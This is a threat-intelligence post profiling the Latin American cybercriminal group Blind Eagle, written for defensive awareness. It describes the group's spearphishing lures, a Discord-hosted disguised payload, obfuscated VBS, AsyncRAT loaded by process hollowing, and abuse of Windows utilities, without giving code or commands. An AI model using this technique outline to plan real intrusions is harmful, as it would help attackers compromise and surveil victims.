Hacker Spotlight: Blind Eagle
Phishing for Answers’ “Hacker Spotlight” is a series of posts analyzing different cybercriminal groups in Latin America. Each post will focus on a different adversary and provide details on each group’s operations, signature techniques, victimology, evolution, and recent campaigns. The objective of this series is to bring awareness to the cyber threat landscape in Latin America.
Overview
FUN FACT: Blind Eagle employs strict targeting and has been known to geolocate its victims. Their tendency to exclusively target South American countries is a distinguishing factor from other cybercriminal groups, which typically have a more randomized approach in their targeting.
Blind Eagle is one of the most sophisticated known cybercriminal groups operating in Latin America. The group is believed to be based in South America, given their use of regional Spanish dialects and intimate knowledge of local institutions. Although Blind Eagle tends to target victims based in South America (especially Colombia), their operations have impacted organizations in Australia, Europe, and US. This threat actor’s campaigns often leverage spearphishing for initial access, deployment of encrypted payloads, commodity RATs, and “Living off the Land” (LOTL) techniques for persistence. At the time of this writing, Blind Eagle’s most recent publicly known operations were reported in April 2023.
Background Information
Evolution
The graphic below shows the evolution of Blind Eagle’s operations beginning from the group’s first reported activities until present day. This analysis, which is based on open-source data, shows how this adversary has matured in its targeting, methods of defense evasion, and operational complexity.
Recent Campaign: Chasing Colombia
One of Blind Eagle’s most recent campaigns was reported in February 2023. The group launched a cyberattack against Colombian victims in the health, financial, law enforcement, immigration, and human rights sectors. Blind Eagle gained initial access via its “true and true” method – spearphishing. The phishing emails contained a password-protected PDF and once users opened the document, a malicious file was downloaded from a Discord content delivery network (CDN). This file appeared to be a .PDF but was in fact a .UUE file (Blind Eagle has previously leveraged UUE files for defense evasion purposes). An obfuscated VBS script within the file was then executed, launching an infection chain that eventually loaded the AsyncRAT malware into memory via process hollowing.
Blind Eagle’s latest operations demonstrate the continued evolution of the group. The adversary’s use of process hollowing and double file extensions indicate that the group is consistently updating its defense evasion tactics. Blind Eagle also continues to execute code through legitimate Windows command-line utilities, as seen in their abuse of regsvcs and regasm utilities (in addition to their use of mshta in previous attacks). Blind Eagle is actively maturing and improving its tools, adding new LOTL techniques to its arsenal, and bypassing network defense solutions. Therefore, it is essential that the information security community continue to monitor this group’s activities.
Resources for Further Reading
MITRE ATT&CK: https://attack.mitre.org/groups/G0099/
BlackBerry: https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia
Ecuador CERT: https://www.ecucert.gob.ec/wp-content/uploads/2022/03/alerta-APTs-2022-03-23.pdf
Check Point Research: https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/
SCILabs: Campaña de Malware atribuida a APT-C-36, contexto y IOCs (scilabs.mx)
Interested in learning more about Blind Eagle? Check Kate Esprit’s and Cat Self’s Black Hat 2023 presentation, Becoming a Dark Knight: Adversary Emulation Demonstration for ATT&CK Evaluations and the associated repository on GitHub.
Approved for Public Release; Distribution Unlimited 23-02410-1. ©2023 The MITRE Corporation. ALL RIGHTS RESERVED.